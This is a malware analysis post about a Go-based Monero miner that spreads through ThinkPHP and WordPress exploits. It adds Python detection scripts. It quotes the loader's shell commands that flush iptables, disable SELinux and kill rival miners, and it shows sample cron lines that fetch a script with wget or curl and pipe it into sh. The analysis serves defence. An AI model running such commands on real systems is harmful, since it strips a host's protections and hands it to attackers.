Another Golang Crypto Miner on the Loose

Written by Larry Cashdollar

March 16, 2021

Larry W. Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

There are many crypto mining malware variants infecting systems on the internet. On Friday, March 4, 2021, I noticed an interesting hit in my honeypot logs. The binary it captured stood out, as it was rather large at 4MB. I immediately thought it would be a crypto miner written in the Go language, and I was correct. This one, however, uses some newer exploits for proliferation.

The malware attempted to exploit the ThinkPHP vulnerability in order to download and execute a script named ldr.sh. The loader script downloads the sysrvv binary and kills off other crypto miners. It also adds a crontab entry that reinfects the system every 30 minutes using wget, curl, or a PHP script, rather than relying on a single download method that could fail if that utility doesn't exist on the host.

The sysrvv binary is UPX packed: it was compressed with the Ultimate Packer for Executables (UPX), which shrinks a binary while leaving it directly executable. These are the unpacked stats:

  $ file sysrvv
  sysrvv: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

  $ sha256sum sysrvv
  47183b14ed24978643de4697abe917847831b1560256ddd76e44e918a6181fd8  sysrvv

  $ sha256sum sysrvv
  d3196b0b4767e86bf7e9e47722a5f733129c16f81f0ccbe5f822bdcfd778ca16  sysrvv

The malware has recently been uploaded to VirusTotal.

We are able to extract some details of the crypto mining pool using the strings command, a command-line tool that extracts readable strings from a binary. This is helpful in tracking other malware that might be contributing to the same mining pool and is therefore likely operated by the same actor. We can also determine that they're mining Monero coins:

  "pools": [
    {
      "algo": "rx/0",
      "coin": null,
      "url": "xmr-eu1.nanopool.org:14444",
      "user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa%s",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": true,
      "enabled": true,
      "tls": false,
      "tls-fingerprint": null,
      "daemon": false,
      "socks5": null,
      "self-select": null
    },
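The pool details above are what strings hands you. As an added example (not code from the post or from the malware), here is a small Python script that reimplements the printable-string scan, pulls the XMRig pool keys out of the result and reduces them to the indicators worth pivoting on across samples: pool URL, wallet and algorithm. The binary blob it scans is constructed, made-up header bytes around the configuration fragment and wallet quoted above; treating the trailing `%s` as a Go fmt placeholder is my assumption.

```python
from __future__ import annotations
import re

# Constructed stand-in for a stripped binary: made-up header/noise bytes
# around a copy of the XMRig pool configuration string quoted in the post.
# Only the JSON fragment and the wallet address come from the sample.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x1a\x9fGo build ID\x00\x03\xff"
    b'"pools": [{"algo": "rx/0", "coin": null, '
    b'"url": "xmr-eu1.nanopool.org:14444", '
    b'"user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa%s", '
    b'"pass": "x", "keepalive": true, "tls": false}]'
    b"\x00\x00\xde\xad\xbe\xef\x00curl_brute_wordpress\x00\x01\x02"
)


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Do what `strings -n MIN_LEN` does: return every run of at least
    min_len printable ASCII bytes (0x20..0x7e), in file order."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


POOL_KEYS = ("algo", "url", "user", "pass")
POOL_KV = re.compile(r'"(%s)":\s*"([^"]*)"' % "|".join(POOL_KEYS))


def extract_pool_config(strings: list[str]) -> dict[str, str]:
    """Pull XMRig-style pool settings (algo/url/user/pass) out of the
    printable strings; the first occurrence of each key wins."""
    found: dict[str, str] = {}
    for s in strings:
        for key, value in POOL_KV.findall(s):
            found.setdefault(key, value)
    return found


def wallet_from_user(user: str) -> str:
    """Strip a trailing '%s' (assumed to be a Go fmt verb the miner fills
    in at run time) and return the bare wallet address. A standard Monero
    address is 95 base58 characters starting with '4'."""
    return user[:-2] if user.endswith("%s") else user


def pool_indicators(data: bytes) -> dict[str, str]:
    """End-to-end: binary bytes -> strings -> pool URL, wallet and algo.
    Matching these across samples is what ties them to one operator."""
    cfg = extract_pool_config(extract_strings(data))
    out = {k: cfg[k] for k in ("algo", "url") if k in cfg}
    if "user" in cfg:
        out["wallet"] = wallet_from_user(cfg["user"])
    return out


if __name__ == "__main__":
    for k, v in pool_indicators(SAMPLE_BINARY).items():
        print(f"{k}: {v}")
```

Run it against a real sample by replacing `SAMPLE_BINARY` with the unpacked file's bytes; the wallet and pool URL are the values to search for in other captures and in VirusTotal-style telemetry.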

The malware attempts to kill off other crypto miners by removing their persistence, and loosens security restrictions by disabling SELinux and iptables on the victim host. It removes any other existing miners, including ones hiding as Docker images.

  if [ $(id -u) == 0 ]; then
    chattr -i /etc/ld.so.preload
    ufw disable
    iptables -F
    service iptables stop
    sysctl kernel.nmi_watchdog=0
    echo 0 >/proc/sys/kernel/nmi_watchdog
    echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
    setenforce 0
    echo SELINUX=disabled > /etc/selinux/config
    sysctl -w vm.nr_hugepages=$(nproc --all)
    chattr -R -ia /var/spool/cron
    chattr -ia /etc/crontab
    chattr -R -ia /var/spool/cron/crontabs
    chattr -R -ia /etc/cron.d
    chattr -iua /tmp/
    chattr -iua /var/tmp/
    killall log_rot
    ps aux | grep -v grep | egrep '2t3ik|qW3xT.2|ddg|./oka|postgres: .. . . /etc/ld.so.preload /etc/rc.d/init.d/kthrotlds /tmp/kthrotlds /usr/sbin/watchdogs /dev/shm/z3.sh /dev/shm/z2.sh /dev/shm/.scr /dev/shm/.kerberods /usr/bin/config.json /usr/bin/exin /usr/local/lib/libioset.so /etc/cron.d/tomcat /etc/rc.d/init.d/watchdogs
    docker ps | egrep 'pocosow|gakeaws|azulu|auto|xmr|mine|monero|slowhttp|bash.shell|entrypoint.sh|/var/sbin/bash' | awk '{print $1}' | xargs -I % docker kill %
    docker images -a | grep 'pocosow|gakeaws|buster-slim|hello-|azulu|registry|xmr|auto|mine|monero|slowhttp' | awk '{print $3}' | xargs -I % docker rmi -f %
    netstat -anp | egrep ':143|:2222|:3333|:3389|:4444|:5555|:6666|:6665|:6667|:7777|:8444|:3347|:14433' | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
    crontab -r
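The loader's hardening reversal and its 30-minute cron reinfection both leave traces a host check can look for. Here is an added Python example (mine, not code from the post) that audits a snapshot of the files the script touches: the SELinux config, sysctl.conf, the live nmi_watchdog and nr_hugepages values, and the cron locations for entries that fetch a script with wget or curl and pipe it straight into a shell. Both snapshots are constructed; `LOADER-HOST.example` is a placeholder because the post does not name the download host, and the PHP download variant the loader also uses is not modelled.

```python
from __future__ import annotations
import re

# Constructed snapshots of the files the loader touches; nothing here is a
# real capture. LOADER-HOST.example is a placeholder for the unnamed host.
COMPROMISED_HOST = {
    "/etc/selinux/config": "SELINUX=disabled\n",
    "/etc/sysctl.conf": "net.ipv4.ip_forward = 0\nkernel.nmi_watchdog=0\n",
    "/proc/sys/kernel/nmi_watchdog": "0\n",
    "/proc/sys/vm/nr_hugepages": "8\n",
    "/var/spool/cron/root": (
        "*/30 * * * * wget -q -O - http://LOADER-HOST.example/ldr.sh | sh >/dev/null 2>&1\n"
        "*/30 * * * * curl -fsSL http://LOADER-HOST.example/ldr.sh | sh >/dev/null 2>&1\n"
    ),
}

CLEAN_HOST = {
    "/etc/selinux/config": "SELINUX=enforcing\n",
    "/etc/sysctl.conf": "net.ipv4.ip_forward = 0\n",
    "/proc/sys/kernel/nmi_watchdog": "1\n",
    "/proc/sys/vm/nr_hugepages": "0\n",
    "/var/spool/cron/root": "0 3 * * * /usr/local/bin/backup.sh\n",
}

# A cron command that downloads with wget or curl and hands the result to a shell.
FETCH_AND_RUN = re.compile(r"\b(wget|curl)\b.*\|\s*(ba)?sh\b")
# The cron locations the loader strips the immutable bit from before writing.
CRON_PATHS = ("/var/spool/cron", "/etc/cron.d", "/etc/crontab")


def audit_host(files: dict[str, str]) -> list[str]:
    """Return one finding per sign of the loader's tampering present in the
    snapshot (path -> file contents). An empty list means nothing fired."""
    findings: list[str] = []

    def get(path: str, default: str = "") -> str:
        return files.get(path, default)

    if "SELINUX=disabled" in get("/etc/selinux/config"):
        findings.append("SELinux set to disabled in /etc/selinux/config")
    if re.search(r"^kernel\.nmi_watchdog\s*=\s*0\b", get("/etc/sysctl.conf"), re.M):
        findings.append("kernel.nmi_watchdog=0 persisted in /etc/sysctl.conf")
    if get("/proc/sys/kernel/nmi_watchdog").strip() == "0":
        findings.append("NMI watchdog currently off")
    pages = get("/proc/sys/vm/nr_hugepages", "0").strip()
    if pages not in ("", "0"):
        # Weak signal on its own (databases use hugepages too), but the
        # loader sets this to the core count for its RandomX (rx/0) miner.
        findings.append(f"vm.nr_hugepages={pages}")

    for path, content in files.items():
        if not path.startswith(CRON_PATHS):
            continue
        for line in content.splitlines():
            if not line.strip() or line.startswith("#"):
                continue
            if FETCH_AND_RUN.search(line):
                findings.append(f"fetch-and-run cron entry in {path}: {line.strip()}")
    return findings


if __name__ == "__main__":
    for f in audit_host(COMPROMISED_HOST):
        print("FINDING:", f)
```

On a live host, build the dictionary by reading those paths (and every file under the cron directories); the `chattr` lines in the loader are the reason the cron files may be writable again even on systems that had locked them down.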

Redress is a tool for analyzing stripped Go binaries. Based on its output, we have a catalog of the vulnerabilities being used to spread this malware.

Table of exploits 

The following functions are also used to attempt a brute force login, based on a list of credentials stored in the malware binary. If access is gained, the malware attempts to upload a plugin or edit a theme.

  wordpress.(*wpExec).login
  wordpress.(*wpExec).exploitUploadPlugin
  wordpress.(*wpExec).exploitWritableTheme
  wordpress.BruteXmlrpc
  wordpress.pwdByUsr

Function to brute force login

A sample of strings from the function in the binary shows a list of credentials and a curl command with the user-agent set to curl_brute_wordpress.

What is interesting is that the malware appears to set the user-agent request header to the exploit name it's attempting. This could be a good way to determine if your system has been attacked or compromised by this particular piece of malware.
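The user-agent observation is easy to turn into a log check. The following Python, added here and not part of the original post, parses Apache/nginx combined-format access log lines, flags requests whose user-agent is the curl_brute_wordpress value seen in the sample, and counts hits per source address. The log lines are constructed; the `EXPLOIT_NAME_UA` heuristic, which assumes the family's other modules follow the same curl_<exploit_name> naming, is my extrapolation and not something the post states.

```python
from __future__ import annotations
import re
from collections import Counter

# Apache/nginx "combined" log format.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample traffic (RFC 5737 test addresses), not real log data.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2021:10:01:12 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "curl_brute_wordpress"
203.0.113.5 - - [04/Mar/2021:10:01:13 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "curl_brute_wordpress"
198.51.100.7 - - [04/Mar/2021:10:02:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
198.51.100.9 - - [04/Mar/2021:10:03:30 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "curl/7.68.0"
"""

# The one user-agent value the post reports verbatim.
KNOWN_UAS = {"curl_brute_wordpress"}
# Assumption: other exploit modules in this family name their UA the same
# way (curl_ plus a snake_case exploit name). Real curl sends "curl/<version>".
EXPLOIT_NAME_UA = re.compile(r"^curl_[a-z0-9]+(_[a-z0-9]+)+$")


def parse_log(text: str) -> list[dict[str, str]]:
    """Parse combined-format lines into dicts; unparseable lines are skipped."""
    recs = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            recs.append(m.groupdict())
    return recs


def find_hits(text: str) -> list[dict[str, str]]:
    """Return the requests whose user-agent marks them as this malware,
    each annotated with the reason it was flagged."""
    hits = []
    for rec in parse_log(text):
        ua = rec["ua"]
        if ua in KNOWN_UAS:
            rec["reason"] = "user-agent seen in the sysrvv sample"
        elif EXPLOIT_NAME_UA.match(ua):
            rec["reason"] = "user-agent looks like an exploit name"
        else:
            continue
        hits.append(rec)
    return hits


def by_source(hits: list[dict[str, str]]) -> Counter:
    """Count hits per (client IP, user-agent) for blocking or triage."""
    return Counter((h["ip"], h["ua"]) for h in hits)


if __name__ == "__main__":
    hits = find_hits(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["method"], h["path"], h["ua"], "<-", h["reason"])
    print(by_source(hits))
```

A 200 on POST /xmlrpc.php with this user-agent means the request reached WordPress, not that a login succeeded; correlate with wp-admin activity from the same address before concluding the brute force worked.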

There also appear to be additional functions for brute forcing JupyterLab notebook credentials, I suspect in an attempt to run arbitrary commands on poorly secured notebooks.

Conclusion

Crypto mining software will continue to evolve and take advantage of the latest software vulnerabilities. Vulnerability classes like command injection and remote code execution will continue to be valued by cyber criminals as a way to monetize your CPU cycles. What we do know for sure is that criminals are updating their malware to use the latest exploits, which might mean older vulnerabilities are either being patched or are becoming a less reliable way to compromise systems. Again, the best course of action is keeping system software updated and using strong passwords with multi-factor authentication.


